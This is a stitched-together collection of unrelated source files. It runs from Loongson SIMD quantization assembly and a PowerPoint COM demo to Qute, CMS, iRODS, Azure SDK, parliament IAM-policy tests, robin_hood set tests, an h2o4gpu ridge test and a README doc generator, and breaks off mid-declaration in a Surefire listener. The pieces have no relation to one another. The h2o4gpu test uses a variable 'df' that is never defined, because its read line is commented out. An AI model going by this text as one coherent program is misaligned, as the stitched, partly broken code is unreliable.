"punpcklhw $f16, $f16, $f20 \n\t" "punpckhhw $f2, $f0, $f22 \n\t" "punpcklhw $f0, $f0, $f22 \n\t" "mov.d $f20, $f26 \n\t" "punpckhhw $f26, $f24, $f28 \n\t" "punpcklhw $f24, $f24, $f28 \n\t" "punpckhhw $f22, $f20, $f30 \n\t" "punpcklhw $f20, $f20, $f30 \n\t" "mov.d $f28, $f18 \n\t" "punpckhwd $f18, 
$f16, $f24 \n\t" "punpcklwd $f16, $f16, $f24 \n\t" "punpckhwd $f30, $f28, $f26 \n\t" "punpcklwd $f28, $f28, $f26 \n\t" "mov.d $f24, $f2 \n\t" "punpckhwd $f2, $f0, $f20 \n\t" "punpcklwd $f0, $f0, $f20 \n\t" "punpckhwd $f26, $f24, $f22 \n\t" "punpcklwd $f24, $f24, $f22 \n\t" "mov.d $f20, $f18 \n\t" "mov.d $f18, $f0 \n\t" "mov.d $f22, $f2 \n\t" "mov.d $f0, $f30 \n\t" "mov.d $f30, $f24 \n\t" "mov.d $f2, $f26 \n\t" "pmaxsh $f0, $f0, $f16 \n\t" "pmaxsh $f2, $f2, $f18 \n\t" "pmaxsh $f0, $f0, $f20 \n\t" "pmaxsh $f2, $f2, $f22 \n\t" "pmaxsh $f0, $f0, $f28 \n\t" "pmaxsh $f2, $f2, $f30 \n\t" "mov.d $f4, $f0 \n\t" "mov.d $f6, $f2 \n\t" "mov.d $f0, $f2 \n\t" "mov.d $f2, $f6 \n\t" "pmaxsh $f0, $f0, $f4 \n\t" "pmaxsh $f2, $f2, $f6 \n\t" "gssdlc1 $f0, 0x7(%[max]) \n\t" "gssdrc1 $f0, 0x0(%[max]) \n\t" : : [pDct]"r"((short *)pDct), [ff]"r"((short *)ff), [mf]"r"((short *)mf), [max]"r"((short *)max) : "memory", "$f0", "$f2", "$f4", "$f6", "$f8", "$f10", "$f12", "$f14", "$f16", "$f18", "$f20", "$f22", "$f24", "$f26", "$f28", "$f30" ); RECOVER_REG; }
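For readers who do not follow Loongson MMI assembly, the quantization routines above appear to implement the usual H.264 forward-quant step: take the absolute value of each coefficient, add the rounding offset `ff`, multiply by the scale `mf`, keep the high 16 bits of the product, and restore the sign. The Python sketch below is illustrative only — it mirrors the argument names above, assumes `ff`/`mf` carry 8 lanes that are reused for both halves of the 4x4 block, and does not model the saturation of the `paddush` instruction.

def wels_quant_4x4(dct, ff, mf):
    """Scalar sketch of the 4x4 forward quant: sign(x) * (((|x| + ff) * mf) >> 16)."""
    out = []
    for i, x in enumerate(dct[:16]):
        j = i % 8                      # ff/mf hold 8 int16 lanes, reused for both 8-coefficient halves
        sign = -1 if x < 0 else 1
        out.append(sign * (((abs(x) + ff[j]) * mf[j]) >> 16))
    return out

# example (made-up values): a flat quantizer with offset 8 and scale 13107
print(wels_quant_4x4([-70, 120] + [0] * 14, [8] * 8, [13107] * 8))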
21,555
893
<reponame>josephobonyo/sigma_coding_youtube
import win32com.client

# create a new instance of PowerPoint
PPTApp = win32com.client.Dispatch("PowerPoint.Application")
PPTApp.Visible = True

# create a new presentation in the application
PPTPresentation = PPTApp.Presentations.Add()

# add a new slide to the presentation
PPTPresentation.Slides.Add(Index = 1, Layout = 12)
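If you want the demo above to leave an artifact on disk, a possible continuation is sketched below. `SaveAs` on the presentation object and `Quit` on the application are standard PowerPoint COM members; the output path is an assumption, and the `Layout = 12` used above corresponds to the blank slide layout.

# Continuation sketch (not part of the original snippet): persist and close.
# The output path below is an assumption - adjust it for your machine.
PPTPresentation.SaveAs(r"C:\temp\hello_powerpoint.pptx")
PPTApp.Quit()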
118
10,225
package io.quarkus.qute;

import java.util.concurrent.CompletionStage;

/**
 *
 * @see ReflectionValueResolver
 */
@FunctionalInterface
interface ValueAccessor {

    /**
     *
     * @param instance
     * @return the value
     */
    CompletionStage<Object> getValue(Object instance);

}
107
852
// -*- C++ -*-
//
// Package:    TrackAssociator
// Class:      FiducialVolume
//
/*
 Description: detector active volume
*/
//
// Original Author:  <NAME>
//
//

#include "TrackingTools/TrackAssociator/interface/FiducialVolume.h"
#include "FWCore/MessageLogger/interface/MessageLogger.h"
#include "FWCore/Utilities/interface/Exception.h"

bool FiducialVolume::isValid() const {
  return minR_ < 1e4 && maxR_ >= minR_ && minZ_ < 1e4 && maxZ_ >= minZ_;
}

void FiducialVolume::addActivePoint(const GlobalPoint& point) {
  if (point.perp() > maxR_)
    maxR_ = point.perp();
  if (fabs(point.eta()) < 1 && point.perp() < minR_)
    minR_ = point.perp();
  if (fabs(point.z()) > maxZ_)
    maxZ_ = fabs(point.z());
  if (fabs(point.eta()) > 1.7 && fabs(point.z()) < minZ_)
    minZ_ = fabs(point.z());
}

void FiducialVolume::reset() {
  minR_ = 1e5;
  maxR_ = -1;
  minZ_ = 1e5;
  maxZ_ = -1;
}

void FiducialVolume::determinInnerDimensions() {
  if (maxR_ > 0 && maxR_ < minR_)
    minR_ = maxR_;
  if (maxZ_ > 0 && maxZ_ < minZ_)
    minZ_ = maxZ_;
}
462
1,442
#ifndef ESCHER_MESSAGE_TABLE_CELL_WITH_EXPRESSION_H
#define ESCHER_MESSAGE_TABLE_CELL_WITH_EXPRESSION_H

#include <escher/message_table_cell.h>
#include <escher/expression_view.h>

namespace Escher {

class MessageTableCellWithExpression : public MessageTableCell {
public:
  MessageTableCellWithExpression(I18n::Message message = (I18n::Message)0);
  const View * subLabelView() const override { return &m_subtitleView; }
  void setHighlighted(bool highlight) override;
  void setLayout(Poincare::Layout layout);
private:
  ExpressionView m_subtitleView;
};

}

#endif
200
333
#include "rsRuleExecSubmit.hpp" #include "rodsErrorTable.h" #include "rodsConnect.h" #include "icatHighLevelRoutines.hpp" #include "rcMisc.h" #include "miscServerFunct.hpp" #include "irods_log.hpp" #include "irods_get_full_path_for_config_file.hpp" #include "irods_random.hpp" #include "irods_configuration_keywords.hpp" #include "key_value_proxy.hpp" #include "catalog_utilities.hpp" #include "ruleExecSubmit.h" #include "server_utilities.hpp" #include "json_serialization.hpp" #include <nlohmann/json.hpp> #include <cstring> #include <string> namespace { using json = nlohmann::json; auto is_input_valid(const ruleExecSubmitInp_t* _input) noexcept -> bool { return _input && _input->packedReiAndArgBBuf && _input->packedReiAndArgBBuf->buf && _input->packedReiAndArgBBuf->len > 0; } auto _rsRuleExecSubmit(RsComm* rsComm, ruleExecSubmitInp_t* ruleExecSubmitInp) -> int { // Do not allow clients to schedule delay rules with session variables in them. // This function will reject rules that have session variables in comments as well. if (irods::contains_session_variables(ruleExecSubmitInp->ruleName)) { rodsLog(LOG_ERROR, "Rules cannot contain session variables. Use dynamic PEPs instead."); return RE_UNSUPPORTED_SESSION_VAR; } ruleExecInfoAndArg_t* rei_info{}; if (const auto ec = unpackReiAndArg(rsComm, &rei_info, ruleExecSubmitInp->packedReiAndArgBBuf); ec < 0) { rodsLog(LOG_ERROR, "_rsRuleExecSubmit: Could not unpack REI buffer [error_code=%i].", ec); return ec; } // EMPTY_REI_PATH is a note to the DBA that this column is not used and // is reserved for future use. rstrcpy(ruleExecSubmitInp->reiFilePath, "EMPTY_REI_PATH", sizeof(ruleExecSubmitInp_t::reiFilePath)); irods::experimental::key_value_proxy kvp{ruleExecSubmitInp->condInput}; kvp[RULE_EXECUTION_CONTEXT_KW] = irods::to_json(rei_info->rei).dump().data(); // Verify that the priority is valid if the client provided one. if (std::strlen(ruleExecSubmitInp->priority) > 0) { try { if (const auto p = std::stoi(ruleExecSubmitInp->priority); p < 1 || p > 9) { rodsLog(LOG_ERROR, "Delay rule priority must satisfy the following requirement: 1 <= P <= 9."); return SYS_INVALID_INPUT_PARAM; } } catch (...) { rodsLog(LOG_ERROR, "Delay rule priority is not an integer."); return SYS_INVALID_INPUT_PARAM; } } else { // The client did not provide a priority, use the default value. rstrcpy(ruleExecSubmitInp->priority, "5", sizeof(ruleExecSubmitInp_t::priority)); } // Register the request. std::string svc_role; if (const auto err = get_catalog_service_role(svc_role); !err.ok()) { irods::log(PASS(err)); return err.code(); } if (irods::CFG_SERVICE_ROLE_PROVIDER == svc_role) { const auto status = chlRegRuleExec(rsComm, ruleExecSubmitInp); if (status < 0) { rodsLog(LOG_ERROR, "_rsRuleExecSubmit: chlRegRuleExec error. status = %d", status); } return status; } if (irods::CFG_SERVICE_ROLE_CONSUMER == svc_role) { rodsLog(LOG_ERROR, "_rsRuleExecSubmit error. 
ICAT is not configured on this host"); return SYS_NO_ICAT_SERVER_ERR; } rodsLog(LOG_ERROR, "role not supported [%s]", svc_role.c_str()); return SYS_SERVICE_ROLE_NOT_SUPPORTED; } } // anonymous namespace int rsRuleExecSubmit(RsComm* rsComm, ruleExecSubmitInp_t* ruleExecSubmitInp, char** ruleExecId) { *ruleExecId = nullptr; if (!is_input_valid(ruleExecSubmitInp)) { rodsLog(LOG_ERROR, "rsRuleExecSubmit: Invalid input (null pointer or empty buffer)"); return SYS_INTERNAL_NULL_INPUT_ERR; } namespace ic = irods::experimental::catalog; if (!ic::connected_to_catalog_provider(*rsComm)) { auto kvp = irods::experimental::make_key_value_proxy(ruleExecSubmitInp->condInput); if (kvp.contains(EXEC_LOCALLY_KW)) { rodsLog(LOG_ERROR, "rsRuleExecSubmit: ReHost config error. ReServer not running locally."); return SYS_CONFIG_FILE_ERR; } kvp[EXEC_LOCALLY_KW] = ""; auto* host_info = ic::redirect_to_catalog_provider(*rsComm); return rcRuleExecSubmit(host_info->conn, ruleExecSubmitInp, ruleExecId); } if (const auto ec = _rsRuleExecSubmit(rsComm, ruleExecSubmitInp); ec < 0) { return ec; } *ruleExecId = strdup(ruleExecSubmitInp->ruleExecId); return 0; }
2,218
1,350
<filename>sdk/resourcemanager/azure-resourcemanager-containerservice/src/main/java/com/azure/resourcemanager/containerservice/models/OpenShiftManagedClusterAadIdentityProvider.java // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.containerservice.models; import com.azure.core.annotation.Fluent; import com.azure.core.util.logging.ClientLogger; import com.fasterxml.jackson.annotation.JsonIgnore; import com.fasterxml.jackson.annotation.JsonProperty; import com.fasterxml.jackson.annotation.JsonTypeInfo; import com.fasterxml.jackson.annotation.JsonTypeName; /** Defines the Identity provider for MS AAD. */ @JsonTypeInfo(use = JsonTypeInfo.Id.NAME, include = JsonTypeInfo.As.PROPERTY, property = "kind") @JsonTypeName("AADIdentityProvider") @Fluent public final class OpenShiftManagedClusterAadIdentityProvider extends OpenShiftManagedClusterBaseIdentityProvider { @JsonIgnore private final ClientLogger logger = new ClientLogger(OpenShiftManagedClusterAadIdentityProvider.class); /* * The clientId password associated with the provider. */ @JsonProperty(value = "clientId") private String clientId; /* * The secret password associated with the provider. */ @JsonProperty(value = "secret") private String secret; /* * The tenantId associated with the provider. */ @JsonProperty(value = "tenantId") private String tenantId; /* * The groupId to be granted cluster admin role. */ @JsonProperty(value = "customerAdminGroupId") private String customerAdminGroupId; /** * Get the clientId property: The clientId password associated with the provider. * * @return the clientId value. */ public String clientId() { return this.clientId; } /** * Set the clientId property: The clientId password associated with the provider. * * @param clientId the clientId value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withClientId(String clientId) { this.clientId = clientId; return this; } /** * Get the secret property: The secret password associated with the provider. * * @return the secret value. */ public String secret() { return this.secret; } /** * Set the secret property: The secret password associated with the provider. * * @param secret the secret value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withSecret(String secret) { this.secret = secret; return this; } /** * Get the tenantId property: The tenantId associated with the provider. * * @return the tenantId value. */ public String tenantId() { return this.tenantId; } /** * Set the tenantId property: The tenantId associated with the provider. * * @param tenantId the tenantId value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. */ public OpenShiftManagedClusterAadIdentityProvider withTenantId(String tenantId) { this.tenantId = tenantId; return this; } /** * Get the customerAdminGroupId property: The groupId to be granted cluster admin role. * * @return the customerAdminGroupId value. */ public String customerAdminGroupId() { return this.customerAdminGroupId; } /** * Set the customerAdminGroupId property: The groupId to be granted cluster admin role. * * @param customerAdminGroupId the customerAdminGroupId value to set. * @return the OpenShiftManagedClusterAadIdentityProvider object itself. 
*/ public OpenShiftManagedClusterAadIdentityProvider withCustomerAdminGroupId(String customerAdminGroupId) { this.customerAdminGroupId = customerAdminGroupId; return this; } /** * Validates the instance. * * @throws IllegalArgumentException thrown if the instance is not valid. */ @Override public void validate() { super.validate(); } }
1,507
811
<filename>tests/unit/test_authorization_file.py import unittest import jsoncfg import json from parliament import analyze_policy_string class TestAuthDetailsFile(unittest.TestCase): def test_auth_details_example(self): auth_details_json = { "UserDetailList": [ { "Path": "/", "UserName": "obama", "UserId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:user/obama", "CreateDate": "2019-12-18 19:10:08+00:00", "GroupList": ["admin"], "AttachedManagedPolicies": [], "Tags": [], } ], "GroupDetailList": [ { "Path": "/", "GroupName": "admin", "GroupId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:group/admin", "CreateDate": "2017-05-15 17:33:36+00:00", "GroupPolicyList": [], "AttachedManagedPolicies": [ { "PolicyName": "AdministratorAccess", "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess", } ], } ], "RoleDetailList": [ { "Path": "/", "RoleName": "MyRole", "RoleId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:role/MyRole", "CreateDate": "2019-08-16 17:27:59+00:00", "AssumeRolePolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": {"Service": "ssm.amazonaws.com"}, "Action": "sts:AssumeRole", } ], }, "InstanceProfileList": [], "RolePolicyList": [ { "PolicyName": "Stuff", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Action": [ "s3:ListBucket", "s3:Put*", "s3:Get*", "s3:*MultipartUpload*", ], "Resource": ["*"], "Effect": "Allow", } ], }, } ], "AttachedManagedPolicies": [], "Tags": [], "RoleLastUsed": {}, }, { "Path": "/", "RoleName": "MyOtherRole", "RoleId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:role/MyOtherRole", "CreateDate": "2019-08-16 17:27:59+00:00", "AssumeRolePolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": {"Service": "ssm.amazonaws.com"}, "Action": "sts:AssumeRole", } ], }, "InstanceProfileList": [], "RolePolicyList": [ { "PolicyName": "SupYo", "PolicyDocument": { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "s3:PutBucketPolicy", "s3:PutBucketAcl", "s3:PutLifecycleConfiguration", "s3:PutObject", "s3:GetObject", "s3:DeleteObject", ], "Resource": "*", } ], }, } ], "AttachedManagedPolicies": [], "Tags": [], "RoleLastUsed": {}, }, ], "Policies": [ { "PolicyName": "NotYourPolicy", "PolicyId": "YAAAAASSQUEEEN", "Arn": "arn:aws:iam::012345678901:policy/NotYourPolicy", "Path": "/", "DefaultVersionId": "v9", "AttachmentCount": 1, "PermissionsBoundaryUsageCount": 0, "IsAttachable": True, "CreateDate": "2020-01-29 21:24:20+00:00", "UpdateDate": "2020-01-29 23:23:12+00:00", "PolicyVersionList": [ { "Document": { "Version": "2012-10-17", "Statement": [ { "Sid": "VisualEditor0", "Effect": "Allow", "Action": [ "s3:PutBucketPolicy", "s3:PutBucketAcl", "s3:PutLifecycleConfiguration", "s3:PutObject", "s3:GetObject", "s3:DeleteObject", ], "Resource": [ "arn:aws:s3:::mybucket/*", "arn:aws:s3:::mybucket", ], } ], }, "VersionId": "v9", "IsDefaultVersion": True, "CreateDate": "2020-01-29 23:23:12+00:00", } ], } ], } findings = [] for policy in auth_details_json["Policies"]: # Ignore AWS defined policies if "arn:aws:iam::aws:" not in policy["Arn"]: continue if ( policy["Path"] == "/service-role/" or policy["Path"] == "/aws-service-role/" or policy["PolicyName"].startswith("AWSServiceRoleFor") or policy["PolicyName"].endswith("ServiceRolePolicy") or policy["PolicyName"].endswith("ServiceLinkedRolePolicy") ): continue for version in policy["PolicyVersionList"]: if not version["IsDefaultVersion"]: continue 
print(version["Document"]) policy = analyze_policy_string( json.dumps(version["Document"]), policy["Arn"], ) findings.extend(policy.findings) # Review the inline policies on Users, Roles, and Groups for user in auth_details_json["UserDetailList"]: for policy in user.get("UserPolicyList", []): policy = analyze_policy_string( json.dumps(policy["PolicyDocument"]), user["Arn"], private_auditors_custom_path=None, ) findings.extend(policy.findings) for role in auth_details_json["RoleDetailList"]: for policy in role.get("RolePolicyList", []): policy = analyze_policy_string( json.dumps(policy["PolicyDocument"]), role["Arn"], private_auditors_custom_path=None, ) findings.extend(policy.findings) for group in auth_details_json["GroupDetailList"]: for policy in group.get("GroupPolicyList", []): policy = analyze_policy_string( json.dumps(policy["PolicyDocument"]), group["Arn"], private_auditors_custom_path=None, ) findings.extend(policy.findings) self.maxDiff = None self.assertTrue("RESOURCE_POLICY_PRIVILEGE_ESCALATION" in str(findings))
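The pattern exercised above — serialize each inline or managed policy document to JSON and hand it to `analyze_policy_string`, then inspect `.findings` — also works outside a unit test. A minimal standalone sketch follows; the wildcard policy document is invented for illustration, and only `analyze_policy_string` and the `.findings` attribute are taken from the test above.

import json
from parliament import analyze_policy_string

# A deliberately broad policy, invented for this example.
policy_doc = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "s3:*", "Resource": "*"}],
}

analyzed = analyze_policy_string(json.dumps(policy_doc))
for finding in analyzed.findings:
    print(finding)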
6,549
1,142
<gh_stars>1000+ #include <robin_hood.h> #include <app/doctest.h> #include <iostream> TYPE_TO_STRING(robin_hood::unordered_flat_set<uint64_t>); TYPE_TO_STRING(robin_hood::unordered_node_set<uint64_t>); TEST_CASE_TEMPLATE("unordered_set_asserts", Set, robin_hood::unordered_flat_set<uint64_t>, robin_hood::unordered_node_set<uint64_t>) { static_assert(std::is_same<typename Set::key_type, uint64_t>::value, "key_type same"); static_assert(std::is_same<typename Set::value_type, uint64_t>::value, "value_type same"); } TEST_CASE_TEMPLATE("unordered_set", Set, robin_hood::unordered_flat_set<uint64_t>, robin_hood::unordered_node_set<uint64_t>) { Set set; set.emplace(UINT64_C(123)); REQUIRE(set.size() == 1U); set.insert(UINT64_C(333)); REQUIRE(set.size() == 2U); set.erase(UINT64_C(222)); REQUIRE(set.size() == 2U); set.erase(UINT64_C(123)); REQUIRE(set.size() == 1U); } TEST_CASE_TEMPLATE("unordered_set_string", Set, robin_hood::unordered_flat_set<std::string>, robin_hood::unordered_node_set<std::string>) { Set set; REQUIRE(set.begin() == set.end()); set.emplace(static_cast<size_t>(2000), 'a'); REQUIRE(set.size() == 1); REQUIRE(set.begin() != set.end()); std::string& str = *set.begin(); REQUIRE(str == std::string(static_cast<size_t>(2000), 'a')); auto it = set.begin(); REQUIRE(++it == set.end()); } TEST_CASE_TEMPLATE("unordered_set_eq", Set, robin_hood::unordered_flat_set<std::string>, robin_hood::unordered_node_set<std::string>) { Set set1; Set set2; REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); set1.emplace("asdf"); // (asdf) == () REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.emplace("huh"); // (asdf) == (huh) REQUIRE(set1.size() == set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set1.emplace("huh"); // (asdf, huh) == (huh) REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.emplace("asdf"); // (asdf, huh) == (asdf, huh) REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); set1.erase("asdf"); // (huh) == (asdf, huh) REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.erase("asdf"); // (huh) == (huh) REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); set1.clear(); // () == (huh) REQUIRE(set1.size() != set2.size()); REQUIRE(set1 != set2); REQUIRE(set2 != set1); set2.erase("huh"); // () == () REQUIRE(set1.size() == set2.size()); REQUIRE(set1 == set2); REQUIRE(set2 == set1); }
1,371
1,699
<reponame>huihui7987/blind_watermark<gh_stars>1000+
# I don't want to use Sphinx, and I don't feel like maintaining a pile of static html files, so I wrote my own generator.
'''
What needs to be parsed out of the readme:
1. "-> Demo code: [examples/demo_pso.py](examples/demo_pso.py)"
2. blocks opened by three backticks plus "python" and closed by three backticks
3. read the text from the py file and substitute it in
4. the first few lines ask for stars and only appear in the readme
What needs to be parsed out of the py files:
1. "# %%" acts as a section break that is given an index value and then inserted into the readme
'''
import os
import sys
import re


def search_code(py_file_name, section_idx):
    '''
    Given a py file name and a section index, return a list with the code from that section of the py file (in markdown format)
    :param py_file_name:
    :param section_idx:
    :return:
    '''
    with open('../' + py_file_name, encoding='utf-8', mode="r") as f:
        content = f.readlines()
    content_new, i, search_idx, idx_first_match = [], 0, 0, None
    while i < len(content) and search_idx <= section_idx:
        if content[i].startswith('# %%'):
            search_idx += 1
            i += 1  # also skip the line carrying the hash-percent marker; it should not go into the docs
        if search_idx < section_idx:
            pass
        elif search_idx == section_idx:
            idx_first_match = idx_first_match or i  # record first match line
            content_new.append(content[i])
        i += 1
    return [
               '-> Demo code: [{py_file_name}#s{section_idx}](https://github.com/guofei9987/blind_watermark/blob/master/{py_file_name}#L{idx_first_match})\n'.
                   format(py_file_name=py_file_name, section_idx=section_idx + 1, idx_first_match=idx_first_match),
               '```python\n'] \
           + content_new \
           + ['```\n']


# %%
def make_doc(origin_file):
    with open(origin_file, encoding='utf-8', mode="r") as f_readme:
        readme = f_readme.readlines()

    regex = re.compile('\[examples/[\w#.]+\]')
    readme_idx = 0
    readme_new = []
    while readme_idx < len(readme):
        readme_line = readme[readme_idx]
        if readme_line.startswith('-> Demo code: ['):
            # take the content inside the square brackets and parse it into a file name and a section number
            py_file_name, section_idx = regex.findall(readme[readme_idx])[0][1:-1].split('#s')
            section_idx = int(section_idx) - 1
            print('inserting code: ', py_file_name, section_idx)
            content_new = search_code(py_file_name, section_idx)
            readme_new.extend(content_new)

            # scan forward to the first position where the code block ends
            while readme[readme_idx] != '```\n':
                readme_idx += 1
        else:
            # if no code needs to be inserted, keep the original content
            readme_new.append(readme_line)
        readme_idx += 1
    return readme_new


# homepage README and en/README
readme_new = make_doc(origin_file='../README.md')

with open('../README.md', encoding='utf-8', mode="w") as f_readme:
    f_readme.writelines(readme_new)

with open('en/README.md', encoding='utf-8', mode="w") as f_readme_en:
    f_readme_en.writelines(readme_new[20:])

# README_cn.md in the root directory and zh/README.md
readme_zh = make_doc(origin_file='../README_cn.md')

with open('../README_cn.md', encoding='utf-8', mode="w") as f_readme:
    f_readme.writelines(readme_zh)

with open('zh/README.md', encoding='utf-8', mode="w") as f_readme_en:
    f_readme_en.writelines(readme_zh)

# docs = ['zh/README.md','en/README.md'
#         ]
# for i in docs:
#     docs_new = make_doc(origin_file=i)
#     with open(i, encoding='utf-8', mode="w") as f:
#         f.writelines(docs_new)

# sys.exit()
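To make the parsing step in `make_doc` above easier to follow, here is a small, self-contained illustration of the marker line it relies on — the `-> Demo code: [examples/...#s<n>]` line in the README. The sample file name is invented; the regular expression and the bracket/`#s` splitting are copied from the script above.

import re

# the same pattern make_doc() uses to locate "-> Demo code: [...]" lines
regex = re.compile(r'\[examples/[\w#.]+\]')

readme_line = "-> Demo code: [examples/example_str.py#s2](examples/example_str.py)\n"

token = regex.findall(readme_line)[0][1:-1]        # 'examples/example_str.py#s2'
py_file_name, section_idx = token.split('#s')      # ('examples/example_str.py', '2')
section_idx = int(section_idx) - 1                 # sections are 1-based in the README, 0-based internally
print(py_file_name, section_idx)                   # examples/example_str.py 1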
1,925
575
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_GRAPHICS_LAYER_TREE_AS_TEXT_H_
#define THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_GRAPHICS_LAYER_TREE_AS_TEXT_H_

#include <memory>

#include "third_party/blink/renderer/platform/graphics/compositing/layers_as_json.h"
#include "third_party/blink/renderer/platform/platform_export.h"

namespace blink {

class GraphicsLayer;
class JSONObject;

PLATFORM_EXPORT std::unique_ptr<JSONObject> GraphicsLayerTreeAsJSON(
    const GraphicsLayer*,
    LayerTreeFlags);

PLATFORM_EXPORT String GraphicsLayerTreeAsTextForTesting(const GraphicsLayer*,
                                                         LayerTreeFlags);

}  // namespace blink

#endif  // THIRD_PARTY_BLINK_RENDERER_PLATFORM_GRAPHICS_GRAPHICS_LAYER_TREE_AS_TEXT_H_
380
458
<filename>tests/python/open_data/glm/test_ridge.py import time import sys import os import numpy as np import pandas as pd import logging print(sys.path) from h2o4gpu.util.testing_utils import find_file, run_glm logging.basicConfig(level=logging.DEBUG) def fun(nGPUs=1, nFolds=1, nLambdas=100, nAlphas=8, validFraction=0.2): name = str(sys._getframe().f_code.co_name) name = sys._getframe(1).f_code.co_name t = time.time() print("cwd: %s" % (os.getcwd())) sys.stdout.flush() print("Reading Data") # df = pd.read_csv("./open_data/simple.txt", delim_whitespace=True) print(df.shape) X = np.array(df.iloc[:, :df.shape[1] - 1], dtype='float32', order='C') y = np.array(df.iloc[:, df.shape[1] - 1], dtype='float32', order='C') t1 = time.time() rmse_train, rmse_test = run_glm(X, y, nGPUs=nGPUs, nlambda=nLambdas, nfolds=nFolds, nalpha=nAlphas, validFraction=validFraction, verbose=0, name=name, solver="ridge") # check rmse print(rmse_train[0, 0]) print(rmse_train[0, 1]) print(rmse_train[0, 2]) print(rmse_test[0, 2]) sys.stdout.flush() if validFraction==0.0: assert rmse_train[0, 0] < 54000 assert rmse_train[0, 1] < 54000 assert rmse_train[0, 2] < 54000 assert rmse_test[0, 2] < 54000 else: if nLambdas>20: assert rmse_train[0, 0] < 50000 assert rmse_train[0, 1] < 50000 assert rmse_train[0, 2] < 50000 assert rmse_test[0, 2] < 50000 else: assert rmse_train[0, 0] < 59000 assert rmse_train[0, 1] < 59000 assert rmse_train[0, 2] < 59000 assert rmse_test[0, 2] < 59000 print('/n Total execution time:%d' % (time.time() - t1)) print("TEST PASSED") sys.stdout.flush() print("Time taken: {}".format(time.time() - t)) # endfunnel(pipes) print("DONE.") sys.stdout.flush() # for now don't test folds with simple because h2o-3 can't handle it # for small data sets altfold = 1 def test_glmridge_ipums_gpu_fold1_quick_0(): fun(nGPUs=1, nFolds=1, nLambdas=3, nAlphas=3, validFraction=0) def test_glmridge_ipums_gpu_fold1_0(): fun(nGPUs=1, nFolds=1, nLambdas=20, nAlphas=3, validFraction=0) def test_glmridge_ipums_gpu_fold5_0(): fun(nGPUs=1, nFolds=altfold, nLambdas=20, nAlphas=3, validFraction=0) def test_glmridge_ipums_gpu_fold1_quick(): fun(nGPUs=1, nFolds=1, nLambdas=5, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu_fold1(): fun(nGPUs=1, nFolds=1, nLambdas=20, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu_fold5(): fun(nGPUs=1, nFolds=altfold, nLambdas=20, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu2_fold1_quick(): fun(nGPUs=2, nFolds=1, nLambdas=3, nAlphas=3, validFraction=0.2) def test_glmridge_ipums_gpu2_fold1(): fun(nGPUs=2, nFolds=1, nLambdas=20, nAlphas=3, validFraction=0.2) if __name__ == '__main__': test_glmridge_ipums_gpu_fold1_quick_0() test_glmridge_ipums_gpu_fold1_0() test_glmridge_ipums_gpu_fold5_0() test_glmridge_ipums_gpu_fold1_quick() test_glmridge_ipums_gpu_fold1() test_glmridge_ipums_gpu_fold5() test_glmridge_ipums_gpu2_fold1_quick() test_glmridge_ipums_gpu2_fold1()
1,614
1,742
#from abstract_jacobian import is_Jacobian, Jacobian
16
318
<filename>surefire-providers/surefire-junit47/src/test/java/org/apache/maven/surefire/junitcore/DiagnosticRunListener.java<gh_stars>100-1000 package org.apache.maven.surefire.junitcore; /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. * * Also licensed under CPL http://junit.sourceforge.net/cpl-v10.html */ import java.util.concurrent.atomic.AtomicInteger; import org.junit.runner.Description; import org.junit.runner.Result; import org.junit.runner.notification.Failure; import org.junit.runner.notification.RunListener; /** * @author <NAME>, kristianAzeniorD0Tno */ public class DiagnosticRunListener extends RunListener { private final AtomicInteger numTestStarted = new AtomicInteger(); private final AtomicInteger numTestFailed = new AtomicInteger(); private final AtomicInteger numTestAssumptionsFailed = new 